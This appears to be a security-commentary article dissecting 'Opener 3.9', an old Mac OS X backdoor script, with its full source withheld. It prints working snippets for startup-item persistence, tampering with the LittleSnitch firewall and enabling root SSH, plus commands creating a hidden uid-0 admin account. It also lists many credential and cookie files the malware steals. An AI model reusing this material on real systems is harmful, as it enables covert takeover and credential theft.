Opener 3.9

A rundown of the most destructive and embarrassing Mac OS X exploit ever.

Get It Try It

A copy of Opener 3.9 reached Rixstep in February 2006 when Oompa Loompa hit. It was sent by its author. The last the security industry have seen of Opener was years ago. Opener is supposedly running today on thousands of OS X Tiger boxes. It has been suggested this is because the boxes in question were already infected when Tiger updates were applied.

It has also been demonstrated how easily Opener sneaks past security controls such as those offered by Sophos and Intego. Suffice it to say the controls used by these companies are primitive and ineffective.

Opener is a 'proof of concept' Unix shell script that shows how terrifyingly easy it is to take complete control of an Apple OS X computer. It was written by a system administrator who for years had tried to get Apple to plug the leak and in the end tired of being told by Apple that their OS X in this respect 'worked as designed'.

Opener was developed openly at the Mac Underground between March and October 2003. When it finally hit the media in October 2003, it was quickly dismissed, largely because Apple fanatics made typically wild dismissive claims such as it needing root access to run - which was of course absolutely ludicrous: the whole point was to show what can be accomplished without root access.

Opener exploited a gaping hole in OS X - a hole the author called not a hole but a crater - that allowed painless escalation to root and therefore to 'owning' any OS X box by a simple unauthorised file operation.

The media buzz over Opener went on the better part of a month and was then forgotten, but the fact remains that it is the single biggest security hole ever in the history of modern operating systems. No other operating system has ever offered such effortless escalation to superuser.

Following is a rundown of Opener 3.9. For obvious reasons the full source is not released.

Preamble

Following are Opener's instructions for use. Note the third paragraph - no sudo commands are needed. Opener is simply placed in the unprotected directory /Library/StartupItems. On reboot the system is owned.

To install this script you need admin access or physical access (boot from a CD or firewire/usb, ignore permissions on the internal drive) or write access to either /Library/StartupItems /System/Library/StartupItems or write access to any existing StartupItem (which you can then replace with this script) or write access to the rc, crontab, or periodic files (and have them run or install the script) or you could trick someone who has an admin account into installing it.

It should go in /System/Library/StartupItems or /Library/StartupItems. (When it is executed it will move itself to /System/Library/StartupItems.)

Since it is a StartupItem it will run as root - thus no 'sudo' commands are needed. If you run it as any other user most of the commands will generate errors! (You could sudo ./opener.)

Variables

A path of /bin:/sbin:/usr/bin:/usr/sbin:/usr/libexec:/System/Library/CoreServices is set and exported.

The Opener version is set to '3.9s'.

The script path is set to the CWD; the script folder is set to the base name of the script path; hostname -s is called to get the Rendevous name; G holds the UID from NetInfo; osxversion is used to check whether Software Update should be disabled. And so forth. Several dozen variables are declared and initialised.

df / | tail -n 1 | awk '{print $5}' is called to establish the percentage of disk free space.

First Cleanup

Older versions of Opener are now cleaned off the target system. The following paths are accessed. dsniff files are deleted if disk used space hits 95%.

/.info
/.performance.txt
/Library/Preferences/dsstart
/Library/Preferences/jtr
/Library/StartupItems/AppleServices
/Library/StartupItems/EnableInternetConnection
/Library/StartupItems/opener
/System/Library/StartupItems/AppleServices
/System/Library/StartupItems/EnableInternetConnection
/System/Library/StartupItems/opener

Utimes, Performance, Utmp, et al

The creation and modification dates of Opener are now set to match Finder's. If Opener already ran today, the script exits. This is determined by checking the file /.performance.txt. Otherwise the start time stamp is now set. Finally /var/run/utmp is deleted so that existing connections disappear.

System accounting is now disabled; logging is disabled; syslog.conf is munged; all system messages are cleared.

Ready!

According to Apple documentation, scripts in /Library run before those in /System, but all paths are nevertheless checked.

If a folder bearing the name of the script does not already exist in /System/Library/StartupItems, it is created; if a folder exists where the script goes, it is destroyed; the script file is then recreated inside the target folder. If the script has a Resources subfolder, it is copied to the target as well.

StartupParameters.plist, Startup Items

StartupParameters.plist is now created. Even the line indents are messed up so as to mimic the original (messed up) file from Apple.

echo "<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<!DOCTYPE plist SYSTEM \"file://localhost/System/Library/DTDs/PropertyList.dtd\">
<plist version=\"0.9\">
<dict>
    <key>Description</key>
        <string> </string>
    <key>OrderPreference</key>
        <string>First</string>
    <key>Provides</key>
    <array>
        <string>FileServices</string>
    </array>
        <key>Requires</key>
        <array>
        <string>Disks</string>
        </array>
        <key>Uses</key>
    <array>
        <string>NetInfo</string>
        <string>NetworkExtensions</string>
        <string>NIS</string>
        <string>NFS</string>
        <string>IPServices</string>
    </array>
</dict>
</plist>" > "/Volumes/${vol}/System/Library/StartupItems/${scriptname}/StartupParameters.plist"

Ownership and permissions for startup items are now set. If the target is Tiger, the ownership is root:wheel and the permissions are 0755. If the target is before Tiger, then 0777 is still fine.

Logout Hook

A logout hook is now set that fixes ownership and permissions for startup items. After the hook is installed, new startup items get the proper ownership and permissions on logout, restart, or shutdown.

Log Files

The following log files, if they exist, are now overwritten: utmp, wtmp, asl.log, lastlog, secure.log, system.log.

Check ID

Opener now checks if it's being run by root - and if not, it logs the fact to the 'performance' file and gracefully exits.

ohphoneX

ohphoneX is a video conferencing application. If it was downloaded on the last run but not installed, it is installed now; if it is already installed, it is run early (here) in the script so it won't display a GUI window.

OS X Firewall

The built-in OS X firewall is now disabled.

AppleFileServer

Preferences for AppleFileServer are now set to disable logging.

Software Update

Software Update (for 10.3 and better) is prevented from auto-updating and possibly fixing security holes.

Virex Exclusion List

The following directories are now added to Virex's exclusion list: /Applications, /Library, /System, /Users, /private, /var, /etc.

NAV LiveUpdate

LiveUpdate is prevented from updating NAV. All IPs in the configuration file are replaced by the loopback 127.0.0.1.

LittleSnitch

LittleSnitch is now dealt with. Killing the LittleSnitch process doesn't work, and deleting its startup item is a bit obvious, so its configuration is changed so it starts after Opener.

if test -d /Library/StartupItems/LittleSnitch ; then
 echo "<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\"
\"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">
<plist version=\"1.0\">
<dict>
    <key>Description</key>
    <string>Loading Little Snitch</string>
    <key>OrderPreference</key>
    <string>Late</string>
    <key>Provides</key>
    <array>
        <string>LittleSnitch</string>
    </array>
</dict>
</plist>" > /Library/StartupItems/LittleSnitch/StartupParameters.plist &

KRec

KRec is a keystroke recorder. If it is already installed, it is run now.

KRec is found at the path /Library/Preferences/KRec_(Faceless).app.

hostconfig, ssh, cron

The files hostconfig, ssh, and cron have to be opened up so anyone can write to them. If someone discovers Opener it will have to come back with limited access. A user immutable flag is set on all the files so they cannot easily be removed.

hostconfig is also altered to turn off auditing.

SSH

If SSH isn't running on 10.3 or greater, the SSH file is overwritten.

if [ "${osxversion%.*}" -eq 3 ] ; then
sshstate=`grep "disable = " /private/etc/xinetd.d/ssh | awk '{print $3}'`
if [ "${sshstate}" = "yes" -o ! -f /private/etc/xinetd.d/ssh ] ; then
 echo "service ssh" > /private/etc/xinetd.d/ssh
 echo "{" >> /private/etc/xinetd.d/ssh
 echo "disable = no" >> /private/etc/xinetd.d/ssh
 echo "socket_type = stream" >> /private/etc/xinetd.d/ssh
 echo "wait = no" >> /private/etc/xinetd.d/ssh
 echo "user = root" >> /private/etc/xinetd.d/ssh
 echo "server = /usr/libexec/sshd-keygen-wrapper" >> /private/etc/xinetd.d/ssh
 echo "server_args = -i" >> /private/etc/xinetd.d/ssh
 echo "groups = yes" >> /private/etc/xinetd.d/ssh
 echo "flags = REUSE IPv6" >> /private/etc/xinetd.d/ssh
 echo "session_create = yes" >> /private/etc/xinetd.d/ssh
 echo "}" >> /private/etc/xinetd.d/ssh &
 echo "opener: wrote out new ssh file" >> /Library/.performance.txt
fi
fi

Remote Login

Remote login must now be turned on. Different routines are used for different versions of OS X.

File Sharing, Windows Sharing, Web Sharing

File sharing, Windows sharing, and web sharing are now turned on if they're not on already.

Apple Remote Desktop, FTP

Apple Remote Desktop client, if present and not turned on, is now turned on; FTP is now turned on.

Part Two: Data Mining

With the Opener system up and running, it's time to cull sensitive information.

An entire directory hive is created under /.temp0 for this purpose; the contents of /var, the key chains, preferences directories, NetInfo databases, and virtual memory will be copied over in due time. The password cracker John the Ripper will be used on the culled data.

The OS version is written to this new hive, as are the various names of the target machine (AppleTalk name, host name, Rendevous name). The MAC address is also stored at this point.

If the target is on a private subnet, the public and private IPs and the local router's internal IP are stored.

Surfin' Safari

Opener now goes online if the target is connected. A special request header is constructed with applicable fields set to 'REMOVED FOR OBVIOUS REASONS'.

Network Ports

Opener now grabs the network port configurations, looking for additional interfaces.

Open Firmware Password

Opener now grabs the stored Open Firmware password for the target.

Other Data Sources

Opener now goes after the following additional data sources which can have passwords that can be cracked. The server serial number is culled if the target is a server.

/Library/Application Support/SnapMail users
/Library/Keychains
/Library/Preferences/.indexed/v_m.txt
/Library/Preferences/DNSUpdate
/Library/Preferences/.dsstart/en0sniff*
/Library/FTPServer/Configuration/ftpusers
/Library/Preferences/.jtr/run/john.pot
/Library/Preferences/KRec.app/Contents/MacOS/*.krec
/Library/Preferences/Saved Files
/Library/Preferences/Netopia/Netopia Preferences
/private/etc/cups/printers.conf
/private/var/db
/Library/WebServer/users
/var/Communigate/*/account.settings
/usr/local/secureit/data

/Library/Preferences/com.apple.loginwindow.plist
/Library/ApplePasswordServer
/Library/Preferences/com.apple.MCX.plist
/System/Library/CoreServices/SystemVersion.plist
/Library/Preferences/SystemConfiguration/NetworkInterfaces.plist
/Library/Preferences/SystemConfiguration/preferences.plist

/Applications/Microsoft Office 2004/Office/OfficePID
/Applications/Microsoft Office X/Office/OfficePID
/Library/Application Support/Adobe/Adobe Registration Database
/Library/Application Support/Alias
/Library/Application Support/Connectix/Virtual PC
/Library/Application Support/Dfine.prefs
/Library/Application Support/Final Cut Express Support/Final Cut Express System ID
/Library/Application Support/AG License
/Library/Application Support/AquaMinds
/Library/Application Support/Omni Group
/Library/Application Support/InterMapper Settings/InterMapper Prefs
/Library/Application Support/Macromedia/*Registration
/Library/Application Support/VPN Tracker/secrets.plist
/Library/Application Support/Objective Development/Little Snitch/registration
/Library/Application Support/ProApps/*System ID
/Library/Preferences/Who's There? serial no.
/Library/Preferences/com.stuffit.Deluxe.plist
/Library/Preferences/com.barebones.bbedit.plist
/Library/Preferences/Netopia/TB2 Activation Key
/Library/Preferences/Retrospect/Retro.Config*
/etc/servermgrd/ssl.key/server.key

Cleaning

Opener now cleans up its own storage, getting rid of big files it no longer needs. locate.database can be removed, as can the cache of virtual memory.

NetInfo passwd

Opener now copies passwords with nidump for later cracking by John the Ripper. Even SMB and SHA-1 files are copied for this purpose. The copied files are then 'uniqued' to save disk space. Thereafter they're copied into the John the Ripper directory for cracking.

User Folder Stuff

Usernames are read from NetInfo. For every name found, if that name appears in /Users, a new subdirectory is created in the /.temp0 hive. The Stickies database, the key chains, recent servers et al are copied for each user.

More Data Mining

Additional files are now copied for the purposes of data mining, amongst others the following, many of which are known to store sensitive (even admin) passwords in the clear or at the very most base64 which is of course trivial to crack. (Yahoo IM is an example of the use of base64 for sensitive passwords.) Note that browser cookies, literally everything, is copied and stored for the purpose of culling sensitive data.

Both data forks and resource forks (with ditto) where applicable are copied.

~/Documents/PGP
~/Library/Preferences/org.noncontinuous.wirelessdriver
~/Library/Preferences/CPU\ Speed\ Accelerator
~/Library/Preferences/com.magisterludi.YourSQL.plist
~/Library/Preferences/com.panic.Transmit.plist
~/Library/Preferences/com.rogueamoeba.Nicecast.plist
~/.termlock
~/Library/Preferences/Tivoli\ Storage\ Manager/*.pwd
~/Library/Preferences/Macron/ABDialer/Preferences
~/.cvspass
~/Library/Preferences/Fetch\ Shortcuts
~/Library/Preferences/com.yahoo.Messenger*
~/Library/Preferences/com.aol.aim.plist
~/Library/Preferences/System\ Optimizer\ X\ Preferences
~/Library/Preferences/CDDB\ Preferences
~/Library/Preferences/PageSuckerDefaultSettings.prf
~/Library/Classic/Preferences/Users\ \&\ Groups\ Data\ File
~/Library/Classic/Preferences/Netopia
~/Library/Preferences/com.microsoft.MessengerDaemon.plist
~/Library/Preferences/VNCViewer.plist
~/Library/Application\ Support/Carracho
~/Library/Application\ Support/Chimera/Profiles/default/*.slt/cookies.txt
~/Library/Preferences/iCab\ Preferences/iCab\ Cookies
~/Library/Mozilla/Profiles/default/*.slt/cookies.txt
~/Library/Phoenix/Profiles/default/*.slt/Cache/cookies.txt
~/Library/Application\ Support/OmniWeb/Cookies.xml
~/Library/Application\ Support/OmniWeb\ 5/Cookies.xml
~/Library/Preferences/Opera*Preferences/cookies*.dat
~/Library/Cookies/Cookies.plist
~/.gnupg
~/Library/Preferences/iVisit\ Preferences
~/.ssh/known_hosts
~/Library/Application Support/Little Snitch/config.plist
~/Library/Classic/Apple Menu Items/Recent Servers
~/Library/Logs/AIM
~/Library/Preferences/Server Settings Preferences
~/Library/Preferences/Server Settings Favorites
~/Library/Preferences/Server Admin Preferences
~/Library/Preferences/com.apple.mail.plist
~/Library/Preferences/Carracho*
~/Library/Preferences/com.carracho.enchilada.plist
~/Library/Preferences/com.geekspiff.chickenofthevnc.plist
~/Library/Preferences/com.apple.WorkgroupManager.plist
~/Library/Application Support/Fire
~/Library/Preferences/com.apple.security.plist
~/Library/Preferences/com.apple.internetconnect.plist
~/Library/Preferences/com.apple.internetconfig.plist
~/Library/Classic/Preferences/Stickies file
~/Library/Preferences/America Online
~/Library/Preferences/ICQ
~/.ssh
~/Library/Recent Servers

Bash History et al

~/.bash_history is copied out, as are 'QuickTime Preferences' and '.DS_Store ' [<-- note the trailing space] from each user's ~/Library/Preferences.

Classic

MacOS Classic can also have interesting information such as passwords and user data.

/System Folder/Preferences/Users & Groups Data File
/System Folder/Preferences/Netopia
/System Folder/Preferences/Stickies file
/System Folder/Note Pad File
/System Folder/Scrapbook File
/System Folder/Preferences/TSM Storage Manager/TSM Backup Preferences/*.pwd

Still More Cleaning

Empty directories in the hidden cache are now removed.

Going Public

Now that the data has been mined, it's time to copy it into each user's ~/Public folder.

LimeWire

LimeWire settings are modified.

Ghost Admin

A ghost admin user is now created on the target. The account name is currently set to 'cyrusd' with the password '1234'. This account will normally not appear in the System Preferences list of accounts. There will be no home folder for the user. The user can however appear in NetInfo Manager; because of this the user account may be removed farther down the line.

If Tiger is running, its defaults are modified so the new user does not appear in either the login or fast user switching menus.

myoutput=`nicl . -read /users/cyrusd passwd | awk '{ print $2 }' 2>/dev/null`
if [ "x${myoutput}" != "M5KnJS9KBGrUM" ] ; then
 nicl . -create /users/cyrusd
 nicl . -create /users/cyrusd uid 0
 nicl . -create /users/cyrusd gid 20
 nicl . -create /users/cyrusd home "/dev/null"
 nicl . -create /users/cyrusd shell "/bin/bash"
 nicl . -create /users/cyrusd passwd "M5KnJS9KBGrUM" # (it's 1234), old one was rQ3p5/hpOpvGE
 nicl . -create /users/cyrusd _writers_passwd cyrusd
 nicl . -create /users/cyrusd expire 0
 nicl . -create /users/cyrusd name cyrusd
 nicl . -create /users/cyrusd realname ""
 nicl . -create /users/cyrusd change 0
 nicl . -create /users/cyrusd class ""
 nicl . -append /groups/admin users cyrusd
 nicl . -append /groups/wheel users cyrusd
 nicl . -create /users/cyrusd naprivs -2147483394 # Thanks to DimBulb. Works great! :)
fi

Empty the Logs

Log files are now sought out and emptied. The following files and locations are targeted: /var/log, /Library/Logs, /var/account, console.log at various locations, Timbuktu logs, and sudoers. cron is also set to regularly delete these logs.

More Cron

While in cron, a routine is added to have it try to grep the password from the swap files (at 3:00 AM by default).

John the Ripper

It's time for password cracking. John the Ripper is downloaded. It is hidden at /Library/Preferences/.jtr.

Two files are downloaded and unzipped from the web; what files from the downloads are needed are copied in and thereafter protected with the user immutable flag. All permissions are set to 'wide open'. Remaining unused files are removed.

A Bigger Wordlist

John the Ripper comes with a formidable wordlist, but OS X also has wordlists in /usr/share/dict. These are now merged with the John the Ripper wordlist.

John the Ripper is then set to run at 'nice 20' on both Jaguar and Panther and later files in separate processes. Using the lowest possible priority ensures the 'crunching' will not be noticeable to the user.

Managed Preferences

/Library is given 0777 so that even if StartupItems is protected, Opener can rename it and create another. The same is applied to /Library/ManagedPreferences, /Library/Preferences/com.apple.MCX.plist, /Groups, /Library/Managed Preferences, and /Library/Macintosh Manager.

Dsniff

dsniff is now downloaded and installed so it can start sniffing passwords. Files are cleaned once dsniff is up and running.

Port Forwarding

Port forwarding is now turned on and dsniff starts sniffing to file.

Download ohphoneX

If ohphoneX is not yet installed on the system, it is downloaded now. It is installed at the path /private/.phone.

Crontab

Lines are added to root's crontab so logs are deleted on a regular basis.

One Last Bit

If Opener now made it into /System/Library/StartupItems then the copy in /Library/StartupItems is disabled by prefixing a 'dot' to its filename. (OS X will not run 'dotted' startup items.)

The end time for the run of Opener is now appended to the 'performance' file. The files asl.log and system.log are deleted; the shell history is cleared; the script exits with error code 0.

Afterword

The Opener project was begun to get across the fact that Apple's security procedures are, in the words of its coauthor, 'lax'. That several of the holes Opener exploits were known by Apple years before word of Opener hit the media and remained open for so long afterwards essentially proves Opener's point. That OS X computers even today are being exploited by Opener brings that point home even more.